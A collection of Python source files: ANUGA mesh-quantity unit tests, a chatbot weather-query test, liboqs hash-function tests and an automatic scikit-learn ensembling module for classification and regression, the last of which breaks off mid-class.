# each node. V now provides id to unique node id
#======================================================
domain.smooth = True
Q, V = quantity.get_vertex_values(xy=False)
answer = num.array([0.5, 2, 4, 5, 0, 1, 3, 4.5])
v_answer = num.array([[4, 5, 0],
[1, 0, 5],
[5, 6, 1],
[2, 1, 6],
[6, 7, 2],
[3, 2, 7]])
assert num.allclose(answer, Q)
assert num.allclose(v_answer, V)
#======================================================
# Set output to be smooth, and if using discontinuous
# algorithms, get one unique value at
# each node, based on centroid values.
# V now provides id to unique node id
#======================================================
domain.smooth = True
domain.using_discontinuous_elevation = True
quantity.centroid_values[:] = num.array([100, 101, 102, 103, 104, 105])
Q, V = quantity.get_vertex_values(xy=False)
answer = answer + 100.0
v_answer = num.array([[4, 5, 0],
[1, 0, 5],
[5, 6, 1],
[2, 1, 6],
[6, 7, 2],
[3, 2, 7]])
assert num.allclose(answer, Q)
assert num.allclose(v_answer, V)
def test_get_interpolated_values(self):
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
domain = Generic_Domain(points, vertices, boundary)
#Constant values
quantity = Quantity(domain, [[0, 0, 0], [1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5]])
# Get interpolated values at centroids
interpolation_points = domain.get_centroid_coordinates()
answer = quantity.get_values(location='centroids')
#print quantity.get_values(points=interpolation_points)
assert num.allclose(answer, quantity.get_values(
interpolation_points=interpolation_points))
#Arbitrary values
quantity = Quantity(domain, [[0, 1, 2], [3, 1, 7], [2, 1, 2], [3, 3, 7],
[1, 4, -9], [2, 5, 0]])
# Get interpolated values at centroids
interpolation_points = domain.get_centroid_coordinates()
answer = quantity.get_values(location='centroids')
#print answer
#print quantity.get_values(interpolation_points=interpolation_points)
assert num.allclose(answer,
quantity.get_values(interpolation_points=interpolation_points,
verbose=False))
#FIXME TODO
#indices = [0,5,3]
#answer = [0.5,1,5]
#assert allclose(answer,
# quantity.get_values(indices=indices, \
# location = 'unique vertices'))
def test_get_interpolated_values_2(self):
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
domain = Generic_Domain(points, vertices)
quantity = Quantity(domain)
quantity.set_values(lambda x, y: x+2*y) # 2 4 4 6
#First pick one point
x, y = 2.0/3, 8.0/3
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 6)
# Then another to test that algorithm won't blindly
# reuse interpolation matrix
x, y = 4.0/3, 4.0/3
v = quantity.get_values(interpolation_points=[[x, y]])
assert num.allclose(v, 4)
def test_get_interpolated_values_with_georef(self):
zone = 56
xllcorner = 308500
yllcorner = 6189000
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
#bac, bce, ecf, dbe
vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]
domain = Generic_Domain(points, vertices,
geo_reference=Geo_reference(zone, xllcorner, yllcorner))
quantity = Quantity(domain)
quantity.set_values(lambda x, y: x+2*y) # 2 4 4 6
#First pick one point (and turn it into absolute coordinates)
x, y = 2.0/3, 8.0/3
v = quantity.get_values(interpolation_points=[
[x+xllcorner, y+yllcorner]])
assert num.allclose(v, 6)
# Then another to test that algorithm won't blindly
# reuse interpolation matrix
x, y = 4.0/3, 4.0/3
v = quantity.get_values(interpolation_points=[
[x+xllcorner, y+yllcorner]])
assert num.allclose(v, 4)
# Try two points
pts = [[2.0/3 + xllcorner, 8.0/3 + yllcorner],
[4.0/3 + xllcorner, 4.0/3 + yllcorner]]
v = quantity.get_values(interpolation_points=pts)
assert num.allclose(v, [6, 4])
# Test it using the geospatial data format with absolute input points and default georef
pts = Geospatial_data(data_points=pts)
v = quantity.get_values(interpolation_points=pts)
assert num.allclose(v, [6, 4])
# Test it using the geospatial data format with relative input points
pts = Geospatial_data(data_points=[[2.0/3, 8.0/3], [4.0/3, 4.0/3]],
geo_reference=Geo_reference(zone, xllcorner, yllcorner))
v = quantity.get_values(interpolation_points=pts)
assert num.allclose(v, [6, 4])
def test_getting_some_vertex_values(self):
"""
get values based on triangle lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
#Create basic mesh
points, vertices, boundary = rectangular(1, 3)
#print "points",points
#print "vertices",vertices
#print "boundary",boundary
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6]])
value = [7]
indices = [1]
quantity.set_values(value,
location='centroids',
indices=indices)
#print "quantity.centroid_values",quantity.centroid_values
#print "quantity.get_values(location = 'centroids') ",\
# quantity.get_values(location = 'centroids')
assert num.allclose(quantity.centroid_values,
quantity.get_values(location='centroids'))
value = [[15, 20, 25]]
quantity.set_values(value, indices=indices)
#print "1 quantity.vertex_values",quantity.vertex_values
assert num.allclose(quantity.vertex_values, quantity.get_values())
assert num.allclose(quantity.edge_values,
quantity.get_values(location='edges'))
# get a subset of elements
subset = quantity.get_values(location='centroids', indices=[0, 5])
answer = [quantity.centroid_values[0], quantity.centroid_values[5]]
assert num.allclose(subset, answer)
subset = quantity.get_values(location='edges', indices=[0, 5])
answer = [quantity.edge_values[0], quantity.edge_values[5]]
#print "subset",subset
#print "answer",answer
assert num.allclose(subset, answer)
subset = quantity.get_values(indices=[1, 5])
answer = [quantity.vertex_values[1], quantity.vertex_values[5]]
#print "subset",subset
#print "answer",answer
assert num.allclose(subset, answer)
def test_smooth_vertex_values(self):
"""
get values based on triangle lists.
"""
from anuga.abstract_2d_finite_volumes.mesh_factory import rectangular
# from anuga.shallow_water.shallow_water_domain import Domain
#Create basic mesh
points, vertices, boundary = rectangular(2, 2)
#print "points",points
#print "vertices",vertices
#print "boundary",boundary
#Create shallow water domain
domain = Generic_Domain(points, vertices, boundary)
#print "domain.number_of_elements ",domain.number_of_elements
quantity = Quantity(domain, [[0, 0, 0], [1, 1, 1], [2, 2, 2], [3, 3, 3],
[4, 4, 4], [5, 5, 5], [6, 6, 6], [7, 7, 7]])
#print "quantity.get_values(location = 'unique vertices')", \
# quantity.get_values(location = 'unique vertices')
#print "quantity.get_values(location = 'unique vertices')", \
# quantity.get_values(indices=[0,1,2,3,4,5,6,7], \
# location = 'unique vertices')
#print quantity.get_values(location = 'unique vertices')
#print quantity.domain.number_of_triangles_per_node
#print quantity.vertex_values
#answer = [0.5, 2, 3, 3, 3.5, 4, 4, 5, 6.5]
#assert allclose(answer,
# quantity.get_values(location = 'unique vertices'))
quantity.smooth_vertex_values()
#print quantity.vertex_values
answer_vertex_values = [[3, 3.5, 0.5], [2, 0.5, 3.5], [3.5, 4, 2], [3, 2, 4],
[4, 5, 3], [3.5, 3, 5], [5, 6.5, 3.5], [4, 3.5, 6.5]]
assert num.allclose(answer_vertex_values,
quantity.vertex_values)
# Just another (slightly larger) test of get_values
assert num.allclose(quantity.get_values(location='centroids'),
quantity.centroid_values)
assert num.allclose(quantity.get_values(location='vertices'),
quantity.vertex_values)
assert num.allclose(quantity.get_values(location='edges'),
quantity.edge_values)
def test_maximum(self):
quantity = Quantity(self.mesh4)
# get reference to data arrays
centroid_values = quantity.centroid_values
vertex_values = quantity.vertex_values
edge_values = quantity.edge_values
quantity.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]],
location='vertices')
assert num.allclose(quantity.vertex_values,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert id(vertex_values) == id(quantity.vertex_values)
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
assert num.allclose(quantity.edge_values, [[2.5, 2.0, 1.5],
[5., 5., 5.],
[4.5, 4.5, 0.],
[3.0, -1.5, -1.5]])
other_quantity = Quantity(self.mesh4)
other_quantity.set_values([[0, 0, 0], [1, 1, 6], [10, 10, 10], [0, 0, 4]],
location='vertices')
#===============================
quantity.maximum(other_quantity)
#===============================
exact_vertex_values = num.array([[1., 2., 3.],
[5., 5., 6.],
[10., 10., 10.],
[0., 3., 4.]])
exact_centroid_values = num.array([2., 5., 10., 1.33333333])
exact_edge_values = num.array([[2.5, 2., 1.5],
[5., 5., 5., ],
[10., 10., 10.],
[3., 2., 0.]])
assert num.allclose(quantity.vertex_values,
exact_vertex_values)
assert num.allclose(quantity.centroid_values,
exact_centroid_values) # Centroid
assert num.allclose(quantity.edge_values, exact_edge_values)
def test_minimum(self):
quantity = Quantity(self.mesh4)
# get reference to data arrays
centroid_values = quantity.centroid_values
vertex_values = quantity.vertex_values
edge_values = quantity.edge_values
quantity.set_values([[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]],
location='vertices')
assert num.allclose(quantity.vertex_values,
[[1, 2, 3], [5, 5, 5], [0, 0, 9], [-6, 3, 3]])
assert id(vertex_values) == id(quantity.vertex_values)
assert num.allclose(quantity.centroid_values, [
2., 5., 3., 0.]) # Centroid
assert num.allclose(quantity.edge_values, [[2.5, 2.0, 1.5],
[5., 5., 5.],
[4.5, 4.5, 0.],
[3.0, -1.5, -1.5]])
other_quantity = Quantity(self.mesh4)
other_quantity.set_values([[0, 0, 0], [1, 1, 6], [10, 10, 10], [0, 0, 4]],
location='vertices')
#===============================
quantity.minimum(other_quantity)
#===============================
exact_vertex_values = num.array([[0., 0., 0.],
[1., 1., 5.],
[0., 0., 9.],
[-6., 0., 3.]])
exact_centroid_values = num.array([0., 2.66666667, 3., 0.])
exact_edge_values = num.array([[0., 0., 0.],
[3.5, 3.5, 1., ],
[4.5, 4.5, 0.],
[2., -1.5, -1.5]])
assert num.allclose(quantity.vertex_values,
exact_vertex_values)
assert num.allclose(quantity.centroid_values,
exact_centroid_values) # Centroid
assert num.allclose(quantity.edge_values, exact_edge_values)
#-------------------------------------------------------------
if __name__ == "__main__":
#e.g. to run a single test: suite = unittest.makeSuite(Test_Quantity, 'test_set_values_from_asc')
suite = unittest.makeSuite(Test_Quantity, 'test_')
runner = unittest.TextTestRunner(verbosity=1)
runner.run(suite)
3189197c2934f8cd2261e7516806da385083c85d | 339 | py | Python | modules/tests/test_weather.py | anamayagarodia/JARVIS-on-Messenger | d7198db0afe99cf3c0f7aacd5d5a16641deba809 | ["MIT"] | 6 | 2017-05-17T23:46:16.000Z | 2017-05-18T19:50:15.000Z | 2 | 2018-08-06T06:03:58.000Z | 2020-01-08T07:57:37.000Z
import modules
def test_weather():
assert('weather' == modules.process_query('tell me the weather in London')[0])
assert('weather' == modules.process_query('weather Delhi')[0])
assert('weather' == modules.process_query('What\'s the weather in Texas?')[0])
assert('weather' != modules.process_query('something random')[0])
31945cb30edaf65a600a39ecfec83118ba06e341 | 1,857 | py | Python | tests/test_hash.py | MicrohexHQ/liboqs | 6340a0ba71f66ad494ede00d38f358b2a4546164 | ["MIT"] | 1 | 2020-10-12T13:30:00.000Z | 2020-10-12T13:30:00.000Z
import hashlib
import helpers
import pytest
import sys
@helpers.filtered_test
@pytest.mark.skipif(sys.platform.startswith("win"), reason="Not supported on Windows")
def test_aes():
helpers.run_subprocess(
[helpers.path_to_executable('test_aes')],
)
@helpers.filtered_test
@pytest.mark.skipif(sys.platform.startswith("win"), reason="Not supported on Windows")
def test_sha3():
helpers.run_subprocess(
[helpers.path_to_executable('test_sha3')],
)
@helpers.filtered_test
@pytest.mark.parametrize('msg', ['', 'a', 'abc', '1234567890123456789012345678901678901567890'])
@pytest.mark.skipif(sys.platform.startswith("win"), reason="Not supported on Windows")
def test_sha256(msg):
output = helpers.run_subprocess(
[helpers.path_to_executable('test_hash'), 'sha256'],
input=msg.encode(),
)
assert(output.rstrip() == hashlib.sha256(msg.encode()).hexdigest())
@helpers.filtered_test
@pytest.mark.parametrize('msg', ['', 'a', 'abc', '1234567890123456789012345678901678901567890'])
@pytest.mark.skipif(sys.platform.startswith("win"), reason="Not supported on Windows")
def test_sha384(msg):
output = helpers.run_subprocess(
[helpers.path_to_executable('test_hash'), 'sha384'],
input=msg.encode(),
)
assert(output.rstrip() == hashlib.sha384(msg.encode()).hexdigest())
@helpers.filtered_test
@pytest.mark.parametrize('msg', ['', 'a', 'abc', '1234567890123456789012345678901678901567890'])
@pytest.mark.skipif(sys.platform.startswith("win"), reason="Not supported on Windows")
def test_sha512(msg):
output = helpers.run_subprocess(
[helpers.path_to_executable('test_hash'), 'sha512'],
input=msg.encode(),
)
assert(output.rstrip() == hashlib.sha512(msg.encode()).hexdigest())
if __name__ == "__main__":
import sys
pytest.main(sys.argv)
31c40436b83c2b1b5cf6a031de834bad6a5aeb45 | 30 | py | Python | hello.py | AleksandrTheFirst/pythonTests | 0c1d7e10ccf34f633d5aea15f039fa6e434c494f | ["Apache-2.0"]
print("Hello from Aleksandr")
9ec4e8a15d0480accb64acdf16f67e7a2701ef39 | 28,269 | py | Python | AutoEn.py | nileshchilka1/AutoEnsembler | 4df8fe160bbfae16e9a9a401ef8a7c8a20ffc414 | ["MIT"] | 3 | 2020-10-24T06:45:58.000Z | 2021-11-05T10:42:56.000Z
import numpy as np
from sklearn.model_selection import train_test_split,GridSearchCV,RandomizedSearchCV
from sklearn.metrics import accuracy_score,confusion_matrix
from sklearn.metrics import r2_score
import warnings
def findCombinationsUtil(arr, index, num, reducedNum,size,unique_classes):
global combinations
if (reducedNum < 0):
return
if (reducedNum == 0):
comb = []
for i in range(index):
comb.append(arr[i]/10)
if len(comb) == size:
comb = zero_padding(comb,unique_classes)
combinations.append(comb)
return
prev = 1 if index == 0 else arr[index - 1]
for k in range(prev, num + 1):
arr[index] = k
findCombinationsUtil(arr, index + 1, num, reducedNum - k, size, unique_classes)
def findCombinations(n,size,unique_classes):
arr = [0] * n
findCombinationsUtil(arr, 0, n, n,size,unique_classes)
def zero_padding(lst,size):
l=len(lst)
for i in range(size-l):
lst.append(0)
return lst
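# Taken together, findCombinationsUtil/findCombinations/zero_padding build
# candidate ensemble weight vectors: non-decreasing compositions of 10 are
# scaled by 1/10 (so each vector sums to 1.0 in steps of 0.1) and zero-padded
# to length `unique_classes` -- which, despite its name, is the number of
# base models (find_best below calls this machinery with Total_models).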
combinations = []
def find_all_combinations(unique_classes):
global combinations
n = 10
for i in range(2,unique_classes+1):
findCombinations(n, i, unique_classes)
combinations += combinations  # NOTE: doubles the list; duplicates are filtered out in the permutation loop below
zeros = [0] * unique_classes
zeros[0] = 1
combinations.append(zeros)
from itertools import permutations
all_combinations = []
for comb in combinations:
perm = permutations(comb)
for i in list(perm):
if i not in all_combinations:
all_combinations.append(i)
return all_combinations
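# Illustrative sketch (not from the source): find_all_combinations(2) returns
# both orderings of (0.1, 0.9) ... (0.5, 0.5) plus the single-model vectors
# (1, 0) and (0, 1), i.e. every 0.1-step weighting of two models.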
class AutoEnClassifier:
def __init__(self,LR=True,SVC=False,RF=True,AB=False,KNN=False,random_state=0,GridSearch=False,optimize=None,scoring='accuracy'):
self.__LR = LR
self.__SVC = SVC
self.__RF = RF
self.__AB = AB
self.__KNN = KNN
self.__random_state = random_state
self.__GridSearch = GridSearch
self.__optimize = optimize
if not GridSearch:
warnings.warn('model will use RandomizedSearch')
self.__scoring = scoring
def fit(self,X_train,y_train,validation_split=0.2,validation_data=False):
self.__storing_model_names = []
self.__X_train = X_train
self.__y_train = y_train
if validation_data:
self.__X_test = validation_data[0]
self.__y_test = validation_data[1]
else:
self.__X_train,self.__X_test,self.__y_train,self.__y_test = train_test_split(X_train,y_train,test_size=validation_split,random_state=self.__random_state)
if self.__LR:
AutoEnClassifier.LR_model_fit(self,param_grid=None)
self.__storing_model_names.append('LR_score')
if self.__SVC:
AutoEnClassifier.SVC_model_fit(self,param_grid=None)
self.__storing_model_names.append('SVC_score')
if self.__RF:
AutoEnClassifier.RF_model_fit(self,param_grid=None)
self.__storing_model_names.append('RF_score')
if self.__AB:
AutoEnClassifier.AB_model_fit(self,param_grid=None)
self.__storing_model_names.append('AB_score')
if self.__KNN:
AutoEnClassifier.KNN_model_fit(self,list_neighbors=None)
self.__storing_model_names.append('KNN_score')
AutoEnClassifier.find_best(self)
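# Minimal usage sketch (X and y are assumed; everything else is from this
# file): fit() tunes each enabled base model with GridSearchCV or
# RandomizedSearchCV on a train/validation split, then find_best() searches
# ensemble weights on the held-out part.
#   clf = AutoEnClassifier(LR=True, RF=True)
#   clf.fit(X, y, validation_split=0.2)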
def LR_model_fit(self,param_grid=None):
from sklearn.linear_model import LogisticRegression
LR_model = LogisticRegression()
if param_grid is None:
parameters = {'C':[0.1,0.5,1,5,10],
'solver':['newton-cg', 'lbfgs', 'sag', 'saga'],
}
if self.__GridSearch:
self.__LR_model = GridSearchCV(estimator=LR_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__LR_model = RandomizedSearchCV(estimator=LR_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__LR_model = GridSearchCV(estimator=LR_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__LR_model = RandomizedSearchCV(estimator=LR_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__LR_model.fit(self.__X_train,self.__y_train)
print(f'LR_score : {accuracy_score(self.__LR_model.predict(self.__X_test),self.__y_test)}')
def SVC_model_fit(self,param_grid=None):
from sklearn.svm import SVC
SVC_model = SVC(probability=True)
if param_grid is None:
parameters = [{'kernel': ['rbf','poly'],
'gamma': [1e-3, 1e-4],
'C': [1, 10, 100, 1000]}]
if self.__GridSearch:
self.__SVC_model = GridSearchCV(estimator=SVC_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__SVC_model = RandomizedSearchCV(estimator=SVC_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__SVC_model = GridSearchCV(estimator=SVC_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__SVC_model = RandomizedSearchCV(estimator=SVC_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__SVC_model.fit(self.__X_train,self.__y_train)
print(f'SVC_score : {accuracy_score(self.__SVC_model.predict(self.__X_test),self.__y_test)}')
def RF_model_fit(self,param_grid=None):
from sklearn.ensemble import RandomForestClassifier
RF_model = RandomForestClassifier()
if param_grid is None:
parameters = {'n_estimators' :[10,50,100,500],
'max_depth' : [4,8,10,12,16],
'min_samples_leaf' : [0.1, 0.2, 0.3, 0.4, 0.5]
}
if self.__GridSearch:
self.__RF_model = GridSearchCV(estimator=RF_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__RF_model = RandomizedSearchCV(estimator=RF_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__RF_model = GridSearchCV(estimator=RF_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__RF_model = RandomizedSearchCV(estimator=RF_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__RF_model.fit(self.__X_train,self.__y_train)
print(f'RF_score : {accuracy_score(self.__RF_model.predict(self.__X_test),self.__y_test)}')
def AB_model_fit(self,param_grid=None):
from sklearn.ensemble import AdaBoostClassifier
AB_model = AdaBoostClassifier()
if param_grid is None:
parameters = {'n_estimators' :[10,50,100,500],
'learning_rate' : [0.01,0.5,0.1,0.15,0.2],
}
if self.__GridSearch:
self.__AB_model = GridSearchCV(estimator=AB_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__AB_model = RandomizedSearchCV(estimator=AB_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__AB_model = GridSearchCV(estimator=AB_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__AB_model = RandomizedSearchCV(estimator=AB_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__AB_model.fit(self.__X_train,self.__y_train)
        print(f'AB_score : {accuracy_score(self.__y_test, self.__AB_model.predict(self.__X_test))}')
def KNN_model_fit(self,list_neighbors=None):
from sklearn.neighbors import KNeighborsClassifier
        if list_neighbors is None:
            list_neighbors = [3,5,7,9,11,13,15]
        # track (best n_neighbors, best score, best fitted model); start the
        # score at -inf so the first candidate is always kept
        n_neighbor_score_model = [None, float('-inf'), None]
for neighbor in list_neighbors:
self.__KNN_model = KNeighborsClassifier(n_neighbors=neighbor)
self.__KNN_model = self.__KNN_model.fit(self.__X_train,self.__y_train)
model_score = self.__KNN_model.score(self.__X_test,self.__y_test)
if model_score > n_neighbor_score_model[1]:
n_neighbor_score_model[0] = neighbor
n_neighbor_score_model[1] = model_score
n_neighbor_score_model[2] = self.__KNN_model
self.__KNN_model = n_neighbor_score_model[2]
        # predict() is the argmax over predict_proba() and also maps back to the
        # original class labels, so use it directly
        y_predict = self.__KNN_model.predict(self.__X_test)
print(f'KNN_score with {n_neighbor_score_model[0]} neighbors: {accuracy_score(self.__y_test,y_predict)}')
    def find_best(self):
        # find_all_combinations() is defined earlier in this module; it
        # enumerates candidate weight vectors, one weight per enabled model
        global combinations
        Total_models = self.__LR + self.__SVC + self.__RF + self.__KNN + self.__AB
        optimize_count = None
        combinations = np.array(find_all_combinations(Total_models))
        all_proba = []
        count = 1
        self.__best_score = [0] + [None] * Total_models
        if self.__LR:
            all_proba.append(self.__LR_model.predict_proba(self.__X_test))
            if self.__best_score[count] is None:
                count += 1
        if self.__SVC:
            all_proba.append(self.__SVC_model.predict_proba(self.__X_test))
            if self.__best_score[count] is None:
                count += 1
        if self.__RF:
            all_proba.append(self.__RF_model.predict_proba(self.__X_test))
            if self.__best_score[count] is None:
                count += 1
        if self.__AB:
            all_proba.append(self.__AB_model.predict_proba(self.__X_test))
            if self.__best_score[count] is None:
                count += 1
        if self.__KNN:
            all_proba.append(self.__KNN_model.predict_proba(self.__X_test))
            if self.__best_score[count] is None:
                count += 1
        all_proba = np.array(all_proba)
        # for every weight combination w, compute the weighted soft vote
        # sum_m w_m * P_m over the stacked per-model probability arrays
        all_proba = np.sum(np.multiply(combinations.T, np.array([all_proba]).T).T, axis=1)
for proba,comb in zip(all_proba,combinations):
y_predict = np.argmax(proba,axis=1)
latest_score = accuracy_score(self.__y_test,y_predict)
if latest_score > self.__best_score[0]:
self.__best_score[0] = latest_score
for i in range(0,len(comb)):
self.__best_score[i+1] = comb[i]
                # scikit-learn's confusion_matrix is indexed [true][predicted],
                # so FP = cm[0][1] and FN = cm[1][0]
                if self.__optimize == 'FP':
                    optimize_count = confusion_matrix(self.__y_test,y_predict)[0][1]
                elif self.__optimize == 'FN':
                    optimize_count = confusion_matrix(self.__y_test,y_predict)[1][0]
            elif latest_score == self.__best_score[0] and self.__optimize == 'FP':
                FP_count = confusion_matrix(self.__y_test,y_predict)[0][1]
                # guard against ties seen before any best-so-far was recorded
                if optimize_count is None or FP_count < optimize_count:
                    print(f'optimized FP from {optimize_count} to {FP_count}')
                    optimize_count = FP_count
                    self.__best_score[0] = latest_score
                    for i in range(0,len(comb)):
                        self.__best_score[i+1] = comb[i]
            elif latest_score == self.__best_score[0] and self.__optimize == 'FN':
                FN_count = confusion_matrix(self.__y_test,y_predict)[1][0]
                if optimize_count is None or FN_count < optimize_count:
                    print(f'optimized FN from {optimize_count} to {FN_count}')
                    optimize_count = FN_count
                    self.__best_score[0] = latest_score
                    for i in range(0,len(comb)):
                        self.__best_score[i+1] = comb[i]
print(f'AutoEn_score : {self.__best_score[0]}')
for i in range(len(self.__storing_model_names)):
print(f'weight for {self.__storing_model_names[i]} : {self.__best_score[i+1]}')
def predict(self,X_test):
all_proba = []
count = 1
try:
if self.__LR:
LR_model_y_predict_proba = self.__LR_model.predict_proba(X_test)
LR_model_y_predict_proba = np.multiply(LR_model_y_predict_proba,self.__best_score[count])
all_proba.append(LR_model_y_predict_proba)
count+=1
if self.__SVC:
SVC_model_y_predict_proba = self.__SVC_model.predict_proba(X_test)
SVC_model_y_predict_proba = np.multiply(SVC_model_y_predict_proba,self.__best_score[count])
all_proba.append(SVC_model_y_predict_proba)
count+=1
if self.__RF:
RF_model_y_predict_proba = self.__RF_model.predict_proba(X_test)
RF_model_y_predict_proba = np.multiply(RF_model_y_predict_proba,self.__best_score[count])
all_proba.append(RF_model_y_predict_proba)
count+=1
if self.__AB:
AB_model_y_predict_proba = self.__AB_model.predict_proba(X_test)
AB_model_y_predict_proba = np.multiply(AB_model_y_predict_proba,self.__best_score[count])
all_proba.append(AB_model_y_predict_proba)
count+=1
if self.__KNN:
KNN_model_y_predict_proba = self.__KNN_model.predict_proba(X_test)
KNN_model_y_predict_proba = np.multiply(KNN_model_y_predict_proba,self.__best_score[count])
all_proba.append(KNN_model_y_predict_proba)
count+=1
y_predict = np.sum(all_proba,axis=0)
except AttributeError:
print('model not fitted yet')
return None
        except Exception as exc:
            print(f'prediction failed: {exc}')
            return None
y_predict = np.argmax(y_predict,axis=1)
return y_predict
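# --- Illustrative usage sketch (added for clarity; not part of the original
# module). Constructor argument names are inferred from the attributes used
# above (self.__LR, self.__RF, self.__optimize, ...); the breast cancer data
# is just a stand-in binary dataset:
#
#   from sklearn.datasets import load_breast_cancer
#   X, y = load_breast_cancer(return_X_y=True)
#   clf = AutoEnClassifier(LR=True, RF=True, KNN=True, optimize='FP')
#   clf.fit(X, y, validation_split=0.2)   # fits each base model, then weights them
#   y_pred = clf.predict(X[:10])          # weighted soft vote over predict_proba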
class AutoEnRegressor:
def __init__(self,LA=True,SVR=False,RF=True,AB=False,KNN=False,random_state=0,GridSearch=False,scoring='r2'):
self.__LA = LA
self.__SVR = SVR
self.__RF = RF
self.__AB = AB
self.__KNN = KNN
self.__random_state = random_state
self.__GridSearch = GridSearch
        if not GridSearch:
            warnings.warn('GridSearch is disabled; falling back to RandomizedSearchCV')
self.__scoring = scoring
def fit(self,X_train,y_train,validation_split=0.2,validation_data=False):
self.__storing_model_names = []
self.__X_train = X_train
self.__y_train = y_train
if validation_data:
self.__X_test = validation_data[0]
self.__y_test = validation_data[1]
else:
self.__X_train,self.__X_test,self.__y_train,self.__y_test = train_test_split(X_train,y_train,test_size=validation_split,random_state=self.__random_state)
        if self.__LA:
            self.LA_model_fit()
            self.__storing_model_names.append('LA_score')
        if self.__SVR:
            self.SVR_model_fit()
            self.__storing_model_names.append('SVR_score')
        if self.__RF:
            self.RF_model_fit()
            self.__storing_model_names.append('RF_score')
        if self.__AB:
            self.AB_model_fit()
            self.__storing_model_names.append('AB_score')
        if self.__KNN:
            self.KNN_model_fit()
            self.__storing_model_names.append('KNN_score')
        self.find_best()
def LA_model_fit(self,param_grid=None):
from sklearn.linear_model import Lasso
LA_model = Lasso()
        if param_grid is None:
parameters = {'alpha':[0.01,0.5,1,2,5]
}
if self.__GridSearch:
self.__LA_model = GridSearchCV(estimator=LA_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__LA_model = RandomizedSearchCV(estimator=LA_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__LA_model = GridSearchCV(estimator=LA_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__LA_model = RandomizedSearchCV(estimator=LA_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__LA_model.fit(self.__X_train,self.__y_train)
print(f'LA_score : {r2_score(self.__y_test,self.__LA_model.predict(self.__X_test))}')
def SVR_model_fit(self,param_grid=None):
from sklearn.svm import SVR
SVR_model = SVR()
        if param_grid is None:
parameters = [{'kernel': ['rbf','poly'],
'gamma': [1e-3, 1e-4],
'C': [1, 10, 100, 1000]}]
if self.__GridSearch:
self.__SVR_model = GridSearchCV(estimator=SVR_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__SVR_model = RandomizedSearchCV(estimator=SVR_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__SVR_model = GridSearchCV(estimator=SVR_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__SVR_model = RandomizedSearchCV(estimator=SVR_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
self.__SVR_model.fit(self.__X_train,self.__y_train)
print(f'SVR_score : {r2_score(self.__y_test,self.__SVR_model.predict(self.__X_test))}')
def RF_model_fit(self,param_grid=None):
from sklearn.ensemble import RandomForestRegressor
RF_model = RandomForestRegressor()
        if param_grid is None:
parameters = {'n_estimators' :[10,50,100,500],
'max_depth' : [4,8,10,12,16],
'min_samples_leaf' : [0.1, 0.2, 0.3, 0.4, 0.5]
}
if self.__GridSearch:
self.__RF_model = GridSearchCV(estimator=RF_model, param_grid=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__RF_model = RandomizedSearchCV(estimator=RF_model, param_distributions=parameters, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
if self.__GridSearch:
self.__RF_model = GridSearchCV(estimator=RF_model, param_grid=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
else:
self.__RF_model = RandomizedSearchCV(estimator=RF_model, param_distributions=param_grid, cv=5,scoring=self.__scoring,n_jobs=-1)
